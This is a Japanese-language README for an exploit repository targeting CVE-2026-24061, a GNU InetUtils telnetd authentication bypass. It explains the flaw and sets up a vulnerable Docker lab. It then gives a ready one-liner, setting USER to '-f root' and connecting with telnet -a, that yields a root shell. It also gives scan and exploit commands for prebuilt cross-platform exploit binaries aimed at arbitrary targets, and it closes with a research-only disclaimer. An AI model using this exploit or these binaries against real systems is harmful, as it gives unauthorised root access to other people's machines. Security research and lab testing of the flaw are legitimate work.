
CVE-2026-24061 のエクスプロイトおよびスキャナー。telnetd の認証バイパスにより、細工した USER 環境変数を介して root シェルを取得します。Docker 環境のセットアップとクロスプラットフォーム対応のエクスプロイトバイナリを含みます。
CVE-2026-24061 は、telnetd における認証バイパス脆弱性であり、攻撃者が特定の環境変数の組み合わせを通じて本人確認を回避し、直接 root 権限のシェルを取得できるものです。
telnetd の認証ロジックには欠陥があります。-a オプション(自動ログイン)と特定の USER 環境変数(例: -f root)を組み合わせて使用すると、通常の認証プロセスをバイパスし、root ユーザーとして直接ログインすることが可能になります。
GNU InetUtils は、GNU プロジェクトにおける基本的なネットワークツールのコレクションです。ftp、telnet、rsh、rlogin、tftp など、多くの伝統的なネットワーククライアントとデーモンが含まれており、包括的で GNU スタイルのネットワークコンポーネントライブラリを提供します。telnetd は、このツールキット内で受信した Telnet 接続要求を処理するサーバープログラムであり、主な役割はリモートユーザーに対話型ターミナルインターフェース(通常はシェル)を提供することです。
inetd または xinetd によって監視されます。要求が到着すると、telnetd が起動されます。login プログラムを呼び出して、ユーザー名とパスワードを検証します。まず、このリポジトリをローカルにダウンロードします。ディレクトリ構造は以下のとおりです:

このディレクトリで、以下のコマンドを実行して CVE-2026-24061 の脆弱性環境を起動します:
docker compose up -d --build

起動後、telnet サービスは 0.0.0.0:2323 で実行されます。

-a オプションは、自動ログイン機能を有効にするために使用されます。-a が有効な場合、telnetd は USER 環境変数をログインユーザー名として読み取ります。USER 環境変数が -f root に設定されている場合、telnetd は -f をオプションフラグとして、root を対象ユーザーとして誤って解釈します。# USER 環境変数を設定し、telnet -a で接続します
env USER='-f root' telnet -a 127.0.0.1 2323
成功すると、root 権限を持つ対話型シェルが取得できます:

cd exp

exp、exp_darwin、exp.exe の3つのファイルが確認できます。これらはそれぞれ Linux、Mac、Windows 用の実行ファイルです。必要なものを選択してください。ツールのソースコードも提供されています。他のバージョンが必要な場合は、自分でコンパイルできます。ここでは Linux 用の exp を使用しています。詳細なヘルプ情報が含まれています。

脆弱性が存在するか検出します(デフォルトではポート 23 をスキャンします):
./exp -mode scan -target your-ip -port your-port

脆弱性を悪用してシェルを取得します:
./exp -mode exploit -target your-ip -port your-port

このプロジェクトは、セキュリティ研究および教育目的のみで提供されています。許可されていないシステムで使用しないでください。このツールの使用によって生じるいかなる結果についても、ユーザーがすべての法的責任を負うものとします。